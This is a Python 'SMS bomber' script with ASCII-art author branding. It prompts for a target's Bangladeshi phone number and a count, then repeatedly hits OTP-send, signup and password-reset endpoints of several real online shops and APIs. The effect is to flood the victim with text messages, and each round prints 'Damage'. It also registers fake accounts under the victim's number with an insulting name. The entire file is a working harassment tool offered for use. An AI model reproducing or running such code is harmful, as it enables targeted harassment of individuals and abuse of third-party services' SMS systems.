import requests
from requests.structures import CaseInsensitiveDict

green = '\033[1;32m'
end = '\033[0m'
print (green+"""  _______ _    _ _  _____                                         
 |__   __| |  | (_)/ ____|                                        
    | |  | |__| |_| (___                                          
    | |  |  __  | |\___ \                                         
    | |  | |  | | |____) |                                        
   _|_|_ |_|  |_|_|_____/____   __  __                            
  / ____|      / ____|__   __| |  \/  |                           
 | (___  _   _| (___    | | ___| \  / |                           
  \___ \| | | |\___ \   | |/ _ \ |\/| |                           
  ____) | |_| |____) |  | |  __/ |  | |                           
 |_____/ \__, |_____/___|_|\___|_|  |_|                           
  / ____| __/ |     |__   __|                                     
 | |     |___/___  __ _| | ___  _ __                              
 | |    | '__/ _ \/ _` | |/ _ \| '__|                             
 | |____| | |  __/ (_| | | (_) | |                                
  \_____|_|  \___|\__,_|_|\___/|_|                                
 |  _ \                                                           
 | |_) |_   _                                                     
 |  _ <| | | |                                                    
 | |_) | |_| |                                                    
 |____/ \__, |                                                    
         __/ |                                                    
   __  _|___/ _____         _____ _    _       _  ___ ____   __   
  / / | |  | |  __ \       / ____| |  | |     | |/ (_)  _ \  \ \  
 | |  | |__| | |  | |_____| (___ | |__| | __ _| ' / _| |_) |  | | 
 | |  |  __  | |  | |______\___ \|  __  |/ _` |  < | |  _ <   | | 
 | |  | |  | | |__| |      ____) | |  | | (_| | . \| | |_) |  | | 
 | |  |_|  |_|_____/      |_____/|_|  |_|\__,_|_|\_\_|____/   | | 
  \_\                                                        /_/  
                                                                  """+end)

# CVALUE
blue = '\33[94m'
lightblue = '\033[94m'
red = '\033[91m'
white = '\33[97m'
yellow = '\33[93m'
green = '\033[1;32m'
cyan = "\033[96m"
end = '\033[0m'
print ("\033[32m")

print ("	 -!-!- WeLcOmE-!-!- ( HD-SHaKiiB ) ( GhOsToFKiinG ) ")


print ("""


   ╔═════════════════════════════════╗
   ║ AuTHor   : SHaKiiB ツ           ║
   ║ FaCeBooK : iTzSHaKiiB           ║
   ║ GitHuB   : iTzSHaKiB            ║
   ╚═════════════════════════════════╝




""")

number  = str(input("[>] Heii Mr : SHaKiiB Sir. apNar aTTack NumBer DiN: "))


amount = int(input("[>] Sir apNar aTTack ar PoriMaN LikHuN: "))




url1 = "http://27.131.15.19/lstyle/api/lsotprequest"

headers1 = CaseInsensitiveDict()

headers1["Content-Length"]="48"

headers1["Content-Type"]="application/json"

data1 = """{
  \"shortcode\": \"2494905\",
  \"msisdn\": \"88"""+number+"""\"
}"""

url2 = "http://45.114.85.19:8080/v3/otp/send?msisdn=88"+number

url3 = "https://m.boibazar.com/api/auth/signup"

headers3 = CaseInsensitiveDict()
headers3["Content-Type"] = "application/x-www-form-urlencoded"

data3 = "email=&phone_number="+number+"&first_name=aBaaaaL%2Bar%2BMayrE%2BBap&is_enabled=true&password=mmmmmm&provider=local_phone&repeatPassword=mmmmmm&username="+number

url5 = "https://m.boibazar.com/api/subscriber/password-forget/"+number


url4 = "https://www.pickaboo.com/rest/all/V1/sendotp?resend=0&storeId=1&mobile="+number+"&eventType=customer_signup_otp"

headers4 = CaseInsensitiveDict()
headers4["Content-Type"] = "application/json"
headers4["Content-Length"] = "0"


url6 = "https://api.wholesalecart.com/v2/user/login-register"

headers6 = CaseInsensitiveDict()
headers6["Content-Type"] = "application/json"

data6 = """
{
  \"phone\": \""""+number+"""\"
}
"""

for i in range(amount):
	try:
		resp1 = requests.post(url1, headers=headers1, data=data1)
		
		resp2 = requests.get(url2)
		
		resp3 = requests.post(url3, headers=headers3, data=data3)
		
		resp4 = requests.post(url4, headers=headers4)
		
		resp6 = requests.post(url6, headers=headers6,  data=data6)
		
		resp5 = requests.get(url5)

		print(str (i+1)+" Damage \n")

	except:
		print ("Please Make Sure Your Internet Connection")